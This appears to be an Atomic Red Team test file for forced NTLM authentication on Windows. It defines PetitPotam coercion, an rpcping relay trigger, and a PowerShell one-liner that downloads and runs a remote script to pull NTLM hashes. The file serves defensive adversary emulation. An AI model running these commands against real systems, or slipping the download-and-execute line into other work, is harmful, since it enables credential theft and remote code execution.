attack_technique: T1187
display_name: Forced Authentication
atomic_tests:
- name: PetitPotam
  auto_generated_guid: 485ce873-2e65-4706-9c7e-ae3ab9e14213
  description: |
    This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system.
  supported_platforms:
  - windows
  input_arguments:
    captureServerIP:
      description: Computer IP to use to receive the authentication (ex. attacker machine used for NTLM relay)
      type: string
      default: 10.0.0.3
    targetServerIP:
      description: Computer IP to force authentication from (ex. domain controller)
      type: string
      default: 10.0.0.2
    efsApi:
      description: EFS API to use to coerce authentication
      type: integer
      default: 1
    petitpotam_path:
      description: PetitPotam Windows executable
      type: path
      default: 'PathToAtomicsFolder\..\ExternalPayloads\PetitPotam.exe'
  dependency_executor_name: powershell
  dependencies:
  - description: |
      PetitPotam binary must exist on disk and at specified location (#{petitpotam_path}).
      And the computer must be domain joined (implicit authentication).
    prereq_command: |
      if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 }
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}"
  executor:
    name: powershell
    elevation_required: false
    command: |
      & "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
      Write-Host "End of PetitPotam attack"
- name: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
  auto_generated_guid: 7f06b25c-799e-40f1-89db-999c9cc84317
  description: PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
  supported_platforms:
  - windows
  executor:
    command: |-
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
      Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
    name: powershell

- name: Trigger an authenticated RPC call to a target server with no Sign flag set
  auto_generated_guid: 81cfdd7f-1f41-4cc5-9845-bb5149438e37
  description: |-
    RpcPing command can be used to trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign flag not Set)
    Ref: https://twitter.com/splinter_code/status/1421144623678988298
  supported_platforms:
  - windows
  input_arguments:
    custom_port:
      description: Specify the custom port number
      type: integer
      default: "9997"
    server_ip:
      description: Specify the server IP address. If not specified, the loop back IP will be used
      type: string
      default: 127.0.0.1
  executor:
    command: 'rpcping -s #{server_ip} -e #{custom_port} /a connect /u NTLM 1>$Null'
    name: powershell
    elevation_required: false